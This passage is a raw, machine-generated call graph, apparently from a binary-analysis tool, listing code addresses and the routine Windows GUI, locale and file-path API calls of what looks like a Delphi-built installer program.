53155->53156 53176 415b28 53156->53176 53158 4206ea 53159 420701 53158->53159 53183 4146cc KiUserCallbackDispatcher 53158->53183 53160 420718 53159->53160 53184 414710 KiUserCallbackDispatcher 53159->53184 53166 42073a 53160->53166 53185 420058 12 API calls 53160->53185 53161 4205de 53161->53158 53162 420649 53161->53162 53169 42063a MulDiv 53161->53169 53181 420840 20 API calls 53162->53181 53167 420662 53167->53158 53182 420058 12 API calls 53167->53182 53180 41a2fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 53169->53180 53172 42067f 53173 42069b MulDiv 53172->53173 53174 4206be 53172->53174 53173->53174 53174->53158 53175 4206c7 MulDiv 53174->53175 53175->53158 53177 415b3a 53176->53177 53186 414468 53177->53186 53179 415b52 53179->53161 53180->53162 53181->53167 53182->53172 53183->53159 53184->53160 53185->53166 53187 414482 53186->53187 53190 410640 53187->53190 53189 414498 53189->53179 53193 40de8c 53190->53193 53192 410646 53192->53189 53194 40deee 53193->53194 53195 40de9f 53193->53195 53200 40defc 53194->53200 53198 40defc 19 API calls 53195->53198 53199 40dec9 53198->53199 53199->53192 53201 40df0c 53200->53201 53203 40df22 53201->53203 53212 40e284 53201->53212 53228 40d7c8 53201->53228 53231 40e134 53203->53231 53206 40d7c8 5 API calls 53207 40df2a 53206->53207 53207->53206 53208 40df96 53207->53208 53234 40dd48 53207->53234 53209 40e134 5 API calls 53208->53209 53211 40def8 53209->53211 53211->53192 53248 40eb54 53212->53248 53214 403778 4 API calls 53215 40e2bf 53214->53215 53215->53214 53216 40e375 53215->53216 53310 40d95c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53215->53310 53311 40e268 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53215->53311 53217 40e390 53216->53217 53218 40e39f 53216->53218 53257 40e5a8 53217->53257 53307 40bc0c 53218->53307 53224 40e39d 53225 403400 4 API calls 53224->53225 53226 40e444 53225->53226 53226->53201 53229 40ebf0 5 API calls 53228->53229 53230 40d7d2 53229->53230 53230->53201 53344 40d6a4 53231->53344 53353 40e13c 53234->53353 53237 40eb54 5 API calls 53238 40dd86 53237->53238 53239 40eb54 5 API calls 53238->53239 53240 40dd91 53239->53240 53241 40dda3 53240->53241 53242 40ddac 53240->53242 53247 40dda9 53240->53247 53363 40dcb0 19 API calls 53241->53363 53360 40dbc0 53242->53360 53245 403420 4 API calls 53246 40de77 53245->53246 53246->53207 53247->53245 53313 40d968 53248->53313 53251 4034e0 4 API calls 53252 40eb77 53251->53252 53253 403744 4 API calls 53252->53253 53254 40eb7e 53253->53254 53255 40d968 5 API calls 53254->53255 53256 40eb8c 53255->53256 53256->53215 53258 40e5d4 53257->53258 53259 40e5de 53257->53259 53318 40d628 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53258->53318 53261 40e620 53259->53261 53262 40e6c1 53259->53262 53263 40e651 53259->53263 53264 40e6a3 53259->53264 53265 40e6f9 53259->53265 53266 40e67d 53259->53266 53267 40e6de 53259->53267 53268 40e75e 53259->53268 53300 40e644 53259->53300 53319 40d94c 53261->53319 53329 40eb90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53262->53329 53263->53300 53325 40da00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53263->53325 53328 40dfcc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53264->53328 53269 40d94c 5 API calls 53265->53269 53326 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53266->53326 53331 40ea78 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53267->53331 53275 40d94c 5 API calls 53268->53275 53278 40e701 53269->53278 53271 403400 4 API calls 53279 40e7d3 53271->53279 53282 40e766 53275->53282 53286 40e70b 53278->53286 53294 40e705 53278->53294 53279->53224 53280 40e6cc 53330 409f20 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53280->53330 53281 40e688 53327 40d658 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53281->53327 53289 40e783 53282->53289 53290 40e76a 53282->53290 53284 40e649 53324 40e0c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53284->53324 53285 40e62c 53322 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53285->53322 53332 40ebf0 53286->53332 53338 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53289->53338 53297 40ebf0 5 API calls 53290->53297 53295 40e709 53294->53295 53299 40ebf0 5 API calls 53294->53299 53295->53300 53336 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53295->53336 53297->53300 53298 40e637 53323 40e454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53298->53323 53303 40e72c 53299->53303 53300->53271 53335 40da88 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53303->53335 53304 40e74e 53337 40e4bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53304->53337 53339 40bbb8 53307->53339 53310->53215 53311->53215 53312 40d95c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53312->53224 53316 40d973 53313->53316 53314 40d9ad 53314->53251 53316->53314 53317 40d9b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53316->53317 53317->53316 53318->53259 53320 40ebf0 5 API calls 53319->53320 53321 40d956 53320->53321 53321->53284 53321->53285 53322->53298 53323->53300 53324->53263 53325->53300 53326->53281 53327->53300 53328->53300 53329->53280 53330->53300 53331->53300 53333 40d968 5 API calls 53332->53333 53334 40ebfd 53333->53334 53334->53300 53335->53295 53336->53304 53337->53300 53338->53300 53340 40bbca 53339->53340 53342 40bbef 53339->53342 53340->53342 53343 40bc6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53340->53343 53342->53224 53342->53312 53343->53342 53345 40ebf0 5 API calls 53344->53345 53346 40d6b1 53345->53346 53347 40d6c4 53346->53347 53351 40ecf4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53346->53351 53347->53207 53349 40d6bf 53352 40d640 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53349->53352 53351->53349 53352->53347 53354 40d94c 5 API calls 53353->53354 53355 40e153 53354->53355 53356 40ebf0 5 API calls 53355->53356 53359 40dd7b 53355->53359 53357 40e160 53356->53357 53357->53359 53364 40e0c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53357->53364 53359->53237 53365 40ad64 19 API calls 53360->53365 53362 40dbe8 53362->53247 53363->53247 53364->53359 53365->53362 53655 413634 SetWindowLongA GetWindowLongA 53656 413691 SetPropA SetPropA 53655->53656 53657 413673 GetWindowLongA 53655->53657 53662 41f394 53656->53662 53657->53656 53658 413682 SetWindowLongA 53657->53658 53658->53656 53667 423c04 53662->53667 53761 423a7c 53662->53761 53768 415268 53662->53768 53663 4136e1 53672 423c3a 53667->53672 53670 423ce4 53673 423ceb 53670->53673 53674 423d1f 53670->53674 53671 423c85 53675 423c8b 53671->53675 53676 423d48 53671->53676 53688 423c5b 53672->53688 53775 423b60 53672->53775 53677 423cf1 53673->53677 53721 423fa9 53673->53721 53680 424092 IsIconic 53674->53680 53681 423d2a 53674->53681 53678 423c90 53675->53678 53679 423cbd 53675->53679 53682 423d63 53676->53682 53683 423d5a 53676->53683 53685 423f0b SendMessageA 53677->53685 53686 423cff 53677->53686 53689 423c96 53678->53689 53690 423dee 53678->53690 53679->53688 53710 423cd6 53679->53710 53711 423e37 53679->53711 53687 4240a6 GetFocus 53680->53687 53680->53688 53691 423d33 53681->53691 53692 4240ce 53681->53692 53784 42418c 11 API calls 53682->53784 53693 423d70 53683->53693 53694 423d61 53683->53694 53685->53688 53686->53688 53713 423cb8 53686->53713 53741 423f4e 53686->53741 53687->53688 53698 4240b7 53687->53698 53688->53663 53699 423e16 PostMessageA 53689->53699 53700 423c9f 53689->53700 53797 423b7c NtdllDefWindowProc_A 53690->53797 53696 4240e5 53691->53696 53691->53713 53817 424848 WinHelpA PostMessageA 53692->53817 53785 4241d4 IsIconic 53693->53785 53793 423b7c NtdllDefWindowProc_A 53694->53793 53708 424103 53696->53708 53709 4240ee 53696->53709 53816 41efec GetCurrentThreadId 73A25940 53698->53816 53803 423b7c NtdllDefWindowProc_A 53699->53803 53705 423ca8 53700->53705 53706 423e9d 53700->53706 53716 423cb1 53705->53716 53717 423dc6 IsIconic 53705->53717 53718 423ea6 53706->53718 53719 423ed7 53706->53719 53707 423e31 53707->53688 53824 424524 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 53708->53824 53818 4244cc 53709->53818 53710->53713 53722 423e03 53710->53722 53779 423b7c NtdllDefWindowProc_A 53711->53779 53713->53688 53783 423b7c NtdllDefWindowProc_A 53713->53783 53715 4240be 53715->53688 53729 4240c6 SetFocus 53715->53729 53716->53713 53730 423d89 53716->53730 53723 423de2 53717->53723 53724 423dd6 53717->53724 53805 423b0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 53718->53805 53780 423b7c NtdllDefWindowProc_A 53719->53780 53721->53688 53732 423fcf IsWindowEnabled 53721->53732 53798 424170 53722->53798 53796 423b7c NtdllDefWindowProc_A 53723->53796 53795 423bb8 15 API calls 53724->53795 53728 423e3d 53736 423e7b 53728->53736 53737 423e59 53728->53737 53729->53688 53730->53688 53794 422c44 ShowWindow PostMessageA PostQuitMessage 53730->53794 53732->53688 53739 423fdd 53732->53739 53735 423edd 53740 423ef5 53735->53740 53781 41ee9c GetCurrentThreadId 73A25940 53735->53781 53743 423a7c 6 API calls 53736->53743 53804 423b0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 53737->53804 53738 423eae 53745 423ec0 53738->53745 53806 41ef50 53738->53806 53753 423fe4 IsWindowVisible 53739->53753 53748 423a7c 6 API calls 53740->53748 53741->53688 53749 423f70 IsWindowEnabled 53741->53749 53751 423e83 PostMessageA 53743->53751 53812 423b7c NtdllDefWindowProc_A 53745->53812 53748->53688 53749->53688 53754 423f7e 53749->53754 53750 423e61 PostMessageA 53750->53688 53751->53688 53753->53688 53755 423ff2 GetFocus 53753->53755 53813 412308 7 API calls 53754->53813 53757 4181d8 53755->53757 53758 424007 SetFocus 53757->53758 53814 415238 53758->53814 53762 423b05 53761->53762 53763 423a8c 53761->53763 53762->53663 53763->53762 53764 423a92 EnumWindows 53763->53764 53764->53762 53765 423aae GetWindow GetWindowLongA 53764->53765 53916 423a14 GetWindow 53764->53916 53766 423acd 53765->53766 53766->53762 53767 423af9 SetWindowPos 53766->53767 53767->53762 53767->53766 53769 415275 53768->53769 53770 4152d0 53769->53770 53771 4152db 53769->53771 53774 4152d9 53769->53774 53770->53774 53920 415054 46 API calls 53770->53920 53919 424b84 13 API calls 53771->53919 53774->53663 53776 423b75 53775->53776 53777 423b6a 53775->53777 53776->53670 53776->53671 53777->53776 53825 408710 GetSystemDefaultLCID 53777->53825 53779->53728 53780->53735 53782 41ef21 53781->53782 53782->53740 53783->53688 53784->53688 53786 42421b 53785->53786 53787 4241e5 SetActiveWindow 53785->53787 53786->53688 53888 423644 53787->53888 53791 424202 53791->53786 53792 424215 SetFocus 53791->53792 53792->53786 53793->53688 53794->53688 53795->53688 53796->53688 53797->53688 53901 41db28 53798->53901 53801 424188 53801->53688 53802 42417c LoadIconA 53802->53801 53803->53707 53804->53750 53805->53738 53807 41ef84 53806->53807 53808 41ef58 IsWindow 53806->53808 53807->53745 53809 41ef67 EnableWindow 53808->53809 53811 41ef72 53808->53811 53809->53811 53810 402660 4 API calls 53810->53811 53811->53807 53811->53808 53811->53810 53812->53688 53813->53688 53815 415253 SetFocus 53814->53815 53815->53688 53816->53715 53817->53707 53819 4244f2 53818->53819 53820 4244d8 53818->53820 53823 402648 4 API calls 53819->53823 53821 424507 53820->53821 53822 4244df SendMessageA 53820->53822 53821->53688 53822->53821 53823->53821 53824->53707 53880 408558 GetLocaleInfoA 53825->53880 53828 403450 4 API calls 53829 408750 53828->53829 53830 408558 5 API calls 53829->53830 53831 408765 53830->53831 53832 408558 5 API calls 53831->53832 53833 408789 53832->53833 53886 4085a4 GetLocaleInfoA 53833->53886 53836 4085a4 GetLocaleInfoA 53837 4087b9 53836->53837 53838 408558 5 API calls 53837->53838 53839 4087d3 53838->53839 53840 4085a4 GetLocaleInfoA 53839->53840 53841 4087f0 53840->53841 53842 408558 5 API calls 53841->53842 53843 40880a 53842->53843 53844 403450 4 API calls 53843->53844 53845 408817 53844->53845 53846 408558 5 API calls 53845->53846 53847 40882c 53846->53847 53848 403450 4 API calls 53847->53848 53849 408839 53848->53849 53850 4085a4 GetLocaleInfoA 53849->53850 53851 408847 53850->53851 53852 408558 5 API calls 53851->53852 53853 408861 53852->53853 53854 403450 4 API calls 53853->53854 53855 40886e 53854->53855 53856 408558 5 API calls 53855->53856 53857 408883 53856->53857 53858 403450 4 API calls 53857->53858 53859 408890 53858->53859 53860 408558 5 API calls 53859->53860 53861 4088a5 53860->53861 53862 4088c2 53861->53862 53863 4088b3 53861->53863 53865 403494 4 API calls 53862->53865 53864 403494 4 API calls 53863->53864 53866 4088c0 53864->53866 53865->53866 53867 408558 5 API calls 53866->53867 53868 4088e4 53867->53868 53869 408901 53868->53869 53870 4088f2 53868->53870 53872 403400 4 API calls 53869->53872 53871 403494 4 API calls 53870->53871 53873 4088ff 53871->53873 53872->53873 53874 403634 4 API calls 53873->53874 53881 408591 53880->53881 53882 40857f 53880->53882 53884 403494 4 API calls 53881->53884 53883 4034e0 4 API calls 53882->53883 53885 40858f 53883->53885 53884->53885 53885->53828 53887 4085c0 53886->53887 53887->53836 53897 4235f0 SystemParametersInfoA 53888->53897 53891 42365d ShowWindow 53893 423668 53891->53893 53894 42366f 53891->53894 53900 423620 SystemParametersInfoA 53893->53900 53896 423b0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 53894->53896 53896->53791 53898 42360e 53897->53898 53898->53891 53899 423620 SystemParametersInfoA 53898->53899 53899->53891 53900->53894 53904 41db4c 53901->53904 53905 41db32 53904->53905 53906 41db59 53904->53906 53905->53801 53905->53802 53906->53905 53913 40cc68 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53906->53913 53908 41db76 53908->53905 53909 41db90 53908->53909 53910 41db83 53908->53910 53914 41bd84 11 API calls 53909->53914 53915 41b380 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53910->53915 53913->53908 53914->53905 53915->53905 53917 423a35 GetWindowLongA 53916->53917 53918 423a41 53916->53918 53917->53918 53919->53774 53920->53774 53921 46b930 53922 46b964 53921->53922 53955 46bdcd 53921->53955 53923 46b9a0 53922->53923 53926 46b9fc 53922->53926 53927 46b9da 53922->53927 53928 46b9eb 53922->53928 53929 46b9b8 53922->53929 53930 46b9c9 53922->53930 53923->53955 54012 468a9c 53923->54012 53924 403400 4 API calls 53925 46be0c 53924->53925 53932 403400 4 API calls 53925->53932 54244 46b8c0 45 API calls 53926->54244 53977 46b4f0 53927->53977 54243 46b6b0 67 API calls 53928->54243 54241 46b240 47 API calls 53929->54241 54242 46b3a8 42 API calls 53930->54242 53938 46be14 53932->53938 53939 46b9be 53939->53923 53939->53955 53940 46ba38 53941 4942ac 18 API calls 53940->53941 53951 46ba7b 53940->53951 53940->53955 53941->53951 53943 414ae0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53943->53951 53944 46bb9e 54245 482b48 123 API calls 53944->54245 53947 42cbb8 6 API calls 53947->53951 53948 46bbb9 53948->53955 53949 46bbf7 54030 469d44 53949->54030 53950 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53950->53951 53951->53943 53951->53944 53951->53947 53951->53949 53951->53950 53952 46ad88 23 API calls 53951->53952 53951->53955 53973 46bcbf 53951->53973 54015 4689d8 53951->54015 54023 46aaf4 53951->54023 54168 482648 53951->54168 54254 46affc 19 API calls 53951->54254 53952->53951 53955->53924 53956 46ad88 23 API calls 53956->53955 53958 46bc5d 53959 403450 4 API calls 53958->53959 53960 46bc6d 53959->53960 53961 46bcc9 53960->53961 53962 46bc79 53960->53962 53967 46bd8b 53961->53967 54091 46ad88 53961->54091 53963 457d3c 24 API calls 53962->53963 53964 46bc98 53963->53964 53966 457d3c 24 API calls 53964->53966 53966->53973 53968 46bce3 53969 46bd24 53968->53969 53970 46bd0c SetActiveWindow 53968->53970 54126 46a0ec 53969->54126 53970->53969 53973->53956 54255 46c244 53977->54255 53980 46b672 53981 403420 4 API calls 53980->53981 53983 46b68c 53981->53983 53982 414ae0 4 API calls 53984 46b53e 53982->53984 53986 403400 4 API calls 53983->53986 53985 46b65e 53984->53985 54258 455f58 13 API calls 53984->54258 53985->53980 53988 403450 4 API calls 53985->53988 53989 46b694 53986->53989 53988->53980 53990 403400 4 API calls 53989->53990 53991 46b69c 53990->53991 53991->53923 53992 46b621 53992->53980 53992->53985 53998 42cd40 7 API calls 53992->53998 53993 42cd40 7 API calls 53995 46b5fa 53993->53995 53994 46b5c1 53994->53980 53994->53992 53994->53993 53995->53992 53999 45142c 4 API calls 53995->53999 53996 46b55c 53996->53994 54259 466428 53996->54259 54001 46b637 53998->54001 54002 46b611 53999->54002 54001->53985 54004 45142c 4 API calls 54001->54004 54264 47e618 42 API calls 54002->54264 54003 466428 19 API calls 54006 46b59c 54003->54006 54007 46b64e 54004->54007 54008 4513fc 4 API calls 54006->54008 54265 47e618 42 API calls 54007->54265 54010 46b5b1 54008->54010 54263 47e618 42 API calls 54010->54263 54013 4689d8 19 API calls 54012->54013 54014 468aab 54013->54014 54014->53940 54018 468a07 54015->54018 54016 4078e4 19 API calls 54017 468a40 54016->54017 54385 453318 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54017->54385 54018->54016 54020 468a48 54018->54020 54021 403400 4 API calls 54020->54021 54022 468a60 54021->54022 54022->53951 54024 46ab05 54023->54024 54025 46ab00 54023->54025 54471 4698a8 46 API calls 54024->54471 54029 46ab03 54025->54029 54386 46a560 54025->54386 54027 46ab0d 54027->53951 54029->53951 54031 403400 4 API calls 54030->54031 54032 469d72 54031->54032 54494 47d4e4 54032->54494 54034 469dd5 54035 469df2 54034->54035 54036 469dd9 54034->54036 54038 469de3 54035->54038 54504 49419c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54035->54504 54501 466628 54036->54501 54041 469f11 54038->54041 54042 469f7c 54038->54042 54090 46a086 54038->54090 54040 469e0e 54040->54038 54044 469e16 54040->54044 54045 403494 4 API calls 54041->54045 54046 403494 4 API calls 54042->54046 54043 403420 4 API calls 54047 46a0b0 54043->54047 54048 46ad88 23 API calls 54044->54048 54049 469f1e 54045->54049 54050 469f89 54046->54050 54047->53958 54051 469e23 54048->54051 54052 40357c 4 API calls 54049->54052 54053 40357c 4 API calls 54050->54053 54063 469e64 54051->54063 54064 469e4c SetActiveWindow 54051->54064 54054 469f2b 54052->54054 54055 469f96 54053->54055 54056 40357c 4 API calls 54054->54056 54057 40357c 4 API calls 54055->54057 54058 469f38 54056->54058 54059 469fa3 54057->54059 54060 40357c 4 API calls 54058->54060 54061 40357c 4 API calls 54059->54061 54065 469f45 54060->54065 54062 469fb0 54061->54062 54067 40357c 4 API calls 54062->54067 54505 42f558 54063->54505 54064->54063 54066 466628 20 API calls 54065->54066 54068 469f53 54066->54068 54069 469fbe 54067->54069 54070 40357c 4 API calls 54068->54070 54071 414b10 4 API calls 54069->54071 54073 469f5c 54070->54073 54074 469f7a 54071->54074 54076 40357c 4 API calls 54073->54076 54522 466960 54074->54522 54080 469f69 54076->54080 54079 469eb5 54082 46ac04 21 API calls 54079->54082 54081 414b10 4 API calls 54080->54081 54081->54074 54083 469ee7 54082->54083 54083->53958 54084 469fe0 54085 414b10 4 API calls 54084->54085 54084->54090 54086 46a043 54085->54086 54525 49505c MulDiv 54086->54525 54088 46a060 54089 414b10 4 API calls 54088->54089 54089->54090 54090->54043 54092 468a9c 19 API calls 54091->54092 54093 46ada0 54092->54093 54094 46adc2 54093->54094 54095 4650f4 7 API calls 54093->54095 54611 4650f4 54094->54611 54095->54094 54099 46adda 54100 46ac04 21 API calls 54099->54100 54101 46ae12 54100->54101 54102 414b10 4 API calls 54101->54102 54103 46ae26 54102->54103 54104 46ae32 54103->54104 54105 46ae5c 54103->54105 54106 414b10 4 API calls 54104->54106 54108 46ae7b 54105->54108 54109 46aea5 54105->54109 54107 46ae46 54106->54107 54111 414b10 4 API calls 54107->54111 54112 414b10 4 API calls 54108->54112 54110 414b10 4 API calls 54109->54110 54113 46aeb9 54110->54113 54114 46ae5a 54111->54114 54115 46ae8f 54112->54115 54116 414b10 4 API calls 54113->54116 54628 46ab1c 54114->54628 54117 414b10 4 API calls 54115->54117 54116->54114 54117->54114 54121 468a9c 19 API calls 54123 46af57 54121->54123 54122 46aef7 54122->54121 54124 46afba 54123->54124 54633 4941f8 18 API calls 54123->54633 54124->53968 54169 46c244 48 API calls 54168->54169 54170 48268b 54169->54170 54171 482694 54170->54171 54881 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54170->54881 54173 414ae0 4 API calls 54171->54173 54174 4826a4 54173->54174 54175 403450 4 API calls 54174->54175 54176 4826b1 54175->54176 54691 46c59c 54176->54691 54179 4826c1 54181 414ae0 4 API calls 54179->54181 54182 4826d1 54181->54182 54183 403450 4 API calls 54182->54183 54184 4826de 54183->54184 54185 469690 SendMessageA 54184->54185 54186 4826f7 54185->54186 54187 482748 54186->54187 54883 4797dc 23 API calls 54186->54883 54189 4241d4 11 API calls 54187->54189 54190 482752 54189->54190 54191 482778 54190->54191 54192 482763 SetActiveWindow 54190->54192 54720 481a78 54191->54720 54192->54191 54241->53939 54242->53923 54243->53923 54244->53923 54245->53948 54254->53951 54266 46c2dc 54255->54266 54258->53996 54260 466442 54259->54260 54261 4078e4 19 API calls 54260->54261 54262 46647d 54261->54262 54262->54003 54263->53994 54264->53992 54265->53985 54267 414ae0 4 API calls 54266->54267 54268 46c310 54267->54268 54327 4666c0 54268->54327 54272 46c322 54273 46c331 54272->54273 54277 46c34a 54272->54277 54361 47e618 42 API calls 54273->54361 54275 403420 4 API calls 54276 46b522 54275->54276 54276->53980 54276->53982 54278 46c391 54277->54278 54279 46c378 54277->54279 54280 46c3f6 54278->54280 54285 46c395 54278->54285 54362 47e618 42 API calls 54279->54362 54364 42cb44 CharNextA 54280->54364 54283 46c405 54284 46c409 54283->54284 54289 46c422 54283->54289 54365 47e618 42 API calls 54284->54365 54287 46c3dd 54285->54287 54285->54289 54363 47e618 42 API calls 54287->54363 54288 46c446 54366 47e618 42 API calls 54288->54366 54289->54288 54341 466830 54289->54341 54294 46c345 54294->54275 54297 46c45f 54298 403778 4 API calls 54297->54298 54299 46c475 54298->54299 54349 42c994 54299->54349 54302 46c486 54367 4668bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54302->54367 54303 46c4b7 54305 42c8c4 5 API calls 54303->54305 54307 46c4c2 54305->54307 54306 46c499 54308 45142c 4 API calls 54306->54308 54309 42c3f4 5 API calls 54307->54309 54310 46c4a6 54308->54310 54311 46c4cd 54309->54311 54368 47e618 42 API calls 54310->54368 54313 42cbb8 6 API calls 54311->54313 54314 46c4d8 54313->54314 54353 46c270 54314->54353 54316 46c4e0 54317 42cd40 7 API calls 54316->54317 54318 46c4e8 54317->54318 54319 46c502 54318->54319 54320 46c4ec 54318->54320 54319->54294 54322 46c50c 54319->54322 54369 47e618 42 API calls 54320->54369 54323 46c514 GetDriveTypeA 54322->54323 54323->54294 54324 46c51f 54323->54324 54370 47e618 42 API calls 54324->54370 54326 46c533 54326->54294 54330 4666da 54327->54330 54329 42cbb8 6 API calls 54329->54330 54330->54329 54331 403450 4 API calls 54330->54331 54332 406ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54330->54332 54333 466723 54330->54333 54371 42caa4 54330->54371 54331->54330 54332->54330 54334 403420 4 API calls 54333->54334 54335 46673d 54334->54335 54336 414b10 54335->54336 54337 414ae0 4 API calls 54336->54337 54338 414b34 54337->54338 54339 403400 4 API calls 54338->54339 54340 414b65 54339->54340 54340->54272 54342 46683a 54341->54342 54343 46684d 54342->54343 54382 42cb34 CharNextA 54342->54382 54343->54288 54345 466860 54343->54345 54347 46686a 54345->54347 54346 466897 54346->54288 54346->54297 54347->54346 54383 42cb34 CharNextA 54347->54383 54350 42c9ed 54349->54350 54351 42c9aa 54349->54351 54350->54302 54350->54303 54351->54350 54384 42cb34 CharNextA 54351->54384 54354 46c2d5 54353->54354 54355 46c283 54353->54355 54354->54316 54355->54354 54356 41ee9c 2 API calls 54355->54356 54357 46c293 54356->54357 54358 46c2ad SHPathPrepareForWriteA 54357->54358 54359 41ef50 6 API calls 54358->54359 54360 46c2cd 54359->54360 54360->54316 54361->54294 54362->54294 54363->54294 54364->54283 54365->54294 54366->54294 54367->54306 54368->54294 54369->54294 54370->54326 54372 403494 4 API calls 54371->54372 54373 42cab4 54372->54373 54374 403744 4 API calls 54373->54374 54377 42caea 54373->54377 54380 42c43c IsDBCSLeadByte 54373->54380 54374->54373 54376 42cb2e 54376->54330 54377->54376 54379 4037b8 4 API calls 54377->54379 54381 42c43c IsDBCSLeadByte 54377->54381 54379->54377 54380->54373 54381->54377 54382->54342 54383->54347 54384->54351 54385->54020 54388 46a5a7 54386->54388 54387 46aa1f 54390 46aa3a 54387->54390 54391 46aa6b 54387->54391 54388->54387 54389 46a662 54388->54389 54393 403494 4 API calls 54388->54393 54392 46a683 54389->54392 54397 46a6c4 54389->54397 54394 403494 4 API calls 54390->54394 54395 403494 4 API calls 54391->54395 54398 403494 4 API calls 54392->54398 54399 46a5e6 54393->54399 54400 46aa48 54394->54400 54396 46aa79 54395->54396 54490 468f84 12 API calls 54396->54490 54405 403400 4 API calls 54397->54405 54402 46a691 54398->54402 54403 414ae0 4 API calls 54399->54403 54489 468f84 12 API calls 54400->54489 54406 414ae0 4 API calls 54402->54406 54407 46a607 54403->54407 54420 46a6c2 54405->54420 54409 46a6b2 54406->54409 54410 403634 4 API calls 54407->54410 54408 403400 4 API calls 54413 46aa9c 54408->54413 54415 403634 4 API calls 54409->54415 54416 46a617 54410->54416 54411 46aa56 54411->54408 54419 403400 4 API calls 54413->54419 54414 46a830 54417 403400 4 API calls 54414->54417 54415->54420 54421 414ae0 4 API calls 54416->54421 54422 46a82e 54417->54422 54418 46a6e4 54423 46a722 54418->54423 54424 46a6ea 54418->54424 54425 46aaa4 54419->54425 54466 46a7a8 54420->54466 54472 469690 54420->54472 54426 46a62b 54421->54426 54484 469acc 43 API calls 54422->54484 54429 403400 4 API calls 54423->54429 54427 403494 4 API calls 54424->54427 54428 403420 4 API calls 54425->54428 54426->54389 54430 414ae0 4 API calls 54426->54430 54431 46a6f8 54427->54431 54432 46aab1 54428->54432 54434 46a720 54429->54434 54435 46a652 54430->54435 54437 47bb50 43 API calls 54431->54437 54432->54029 54433 46a7ef 54438 403494 4 API calls 54433->54438 54478 469984 54434->54478 54439 403634 4 API calls 54435->54439 54441 46a710 54437->54441 54442 46a7fd 54438->54442 54439->54389 54440 46a859 54448 46a864 54440->54448 54449 46a8ba 54440->54449 54444 403634 4 API calls 54441->54444 54445 414ae0 4 API calls 54442->54445 54444->54434 54447 46a81e 54445->54447 54446 46a749 54453 46a754 54446->54453 54454 46a7aa 54446->54454 54450 403634 4 API calls 54447->54450 54452 403494 4 API calls 54448->54452 54451 403400 4 API calls 54449->54451 54450->54422 54457 46a8c2 54451->54457 54458 46a872 54452->54458 54456 403494 4 API calls 54453->54456 54455 403400 4 API calls 54454->54455 54455->54466 54461 46a762 54456->54461 54470 46a96b 54457->54470 54485 49419c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54457->54485 54458->54457 54462 403634 4 API calls 54458->54462 54464 46a8b8 54458->54464 54460 46a8e5 54460->54470 54486 494448 18 API calls 54460->54486 54465 403634 4 API calls 54461->54465 54461->54466 54462->54458 54464->54457 54465->54461 54466->54414 54466->54433 54468 46aa0c 54488 42913c SendMessageA SendMessageA 54468->54488 54487 4290ec SendMessageA 54470->54487 54471->54027 54491 42a038 SendMessageA 54472->54491 54474 46969f 54475 4696bf 54474->54475 54492 42a038 SendMessageA 54474->54492 54475->54418 54477 4696af 54477->54418 54482 4699b1 54478->54482 54479 469a13 54480 403400 4 API calls 54479->54480 54481 469a28 54480->54481 54481->54446 54482->54479 54493 469908 43 API calls 54482->54493 54484->54440 54485->54460 54486->54470 54487->54468 54488->54387 54489->54411 54490->54411 54491->54474 54492->54477 54493->54482 54495 47d4fd 54494->54495 54499 47d53a 54494->54499 54526 455ce0 54495->54526 54499->54034 54500 47d551 54500->54034 54581 46653c 54501->54581 54504->54040 54506 42f564 54505->54506 54507 42f587 GetActiveWindow GetFocus 54506->54507 54508 41ee9c 2 API calls 54507->54508 54509 42f59e 54508->54509 54510 42f5bb 54509->54510 54511 42f5ab RegisterClassA 54509->54511 54512 42f64a SetFocus 54510->54512 54513 42f5c9 CreateWindowExA 54510->54513 54511->54510 54515 403400 4 API calls 54512->54515 54513->54512 54514 42f5fc 54513->54514 54602 424274 54514->54602 54517 42f666 54515->54517 54521 494448 18 API calls 54517->54521 54518 42f624 54519 42f62c CreateWindowExA 54518->54519 54519->54512 54520 42f642 ShowWindow 54519->54520 54520->54512 54521->54079 54608 44b50c 54522->54608 54524 466967 54524->54084 54525->54088 54527 455cf1 54526->54527 54528 455cf5 54527->54528 54529 455cfe 54527->54529 54552 4559e4 54528->54552 54560 455ac4 29 API calls 54529->54560 54532 455cfb 54532->54499 54533 47d154 54532->54533 54535 47d250 